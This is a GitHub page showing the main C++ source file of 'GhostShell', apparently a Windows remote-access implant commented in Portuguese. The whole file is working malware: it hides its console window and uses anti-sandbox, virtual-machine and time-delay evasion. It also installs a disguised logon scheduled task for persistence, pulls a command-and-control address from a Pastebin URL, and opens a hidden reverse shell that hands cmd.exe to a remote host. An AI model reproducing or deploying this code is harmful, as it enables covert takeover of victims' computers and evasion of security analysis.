GhostShell/main.cpp at main · zahanzo/GhostShell · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <iostream>
#include <string>
#include <vector>

#pragma comment(lib, "ws2_32.lib")

// Nossos módulos customizados
#include "Obfuscator.hpp"
#include "AntiSandbox.hpp"
#include "DownloadManager.hpp"
#include "PersistenceManager.hpp"

// Protótipo da função (Avisa o compilador que ela existe lá embaixo)
void ExecuteReverseShell(const std::string& ip, int port);

int main() {
    // --- 1. OCULTAÇÃO DA INTERFACE ---
    HWND hWnd = GetConsoleWindow();
    if (hWnd) ShowWindow(hWnd, SW_HIDE);

    // --- 2. DEFESA ATIVA (ANTI-ANALYSIS) ---
    // Se for testar em um ambiente controlado, comente essa parte para evitar falsos positivos
    if (AntiSandbox::IsLowResources() || AntiSandbox::IsSingleCore() || AntiSandbox::IsVirtualMachine()) {
        return 0;
    }

    // --- 3. EVASÃO POR TEMPO ---
    AntiSandbox::ExecuteHeavyDelay(120000000);

    // --- 4. PERSISTÊNCIA (TASK SCHEDULER) ---
    wchar_t szPath[MAX_PATH];
    GetModuleFileNameW(NULL, szPath, MAX_PATH);
    PersistenceManager::CreateLogonTask(L"WinNetDiagnosticService", szPath);

    // --- 5. COMUNICAÇÃO C2 (MEMORY-ONLY) ---
    DownloadManager dl;
    std::string rawCommand = dl.FetchRemoteCommand(PROTECT("https://pastebin.com/raw/YOUR-PASTEVIN-ID")); // Substitua pelo seu URL real

    if (!rawCommand.empty()) {
        // --- 6. PARSING DO COMANDO ---
        size_t delimiterPos = rawCommand.find('|');
        if (delimiterPos != std::string::npos) {
            std::string ip = rawCommand.substr(0, delimiterPos);
            int port = std::stoi(rawCommand.substr(delimiterPos + 1));

            // --- 7. PAYLOAD FINAL (REVERSE SHELL) ---
            ExecuteReverseShell(ip, port); // Passando a string diretamente
        }
    }
    return 0;
}

// Implementação da função usando API moderna e segura
void ExecuteReverseShell(const std::string& ip, int port) {
    WSADATA wsaData;
    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) return;

    SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (s == INVALID_SOCKET) {
        WSACleanup();
        return;
    }

    sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(static_cast<unsigned short>(port));

    // Uso correto do inet_pton
    if (inet_pton(AF_INET, ip.c_str(), &addr.sin_addr) <= 0) {
        closesocket(s);
        WSACleanup();
        return;
    }

    if (WSAConnect(s, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        closesocket(s);
        WSACleanup();
        return;
    }

    STARTUPINFOA sinfo;
    PROCESS_INFORMATION pinfo;
    SecureZeroMemory(&sinfo, sizeof(sinfo));
    sinfo.cb = sizeof(sinfo);
    sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
    sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)s;
    sinfo.wShowWindow = SW_HIDE;

    char cmdPath[] = "cmd.exe";
    if (CreateProcessA(NULL, cmdPath, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo)) {
        CloseHandle(pinfo.hProcess);
        CloseHandle(pinfo.hThread);
    }
}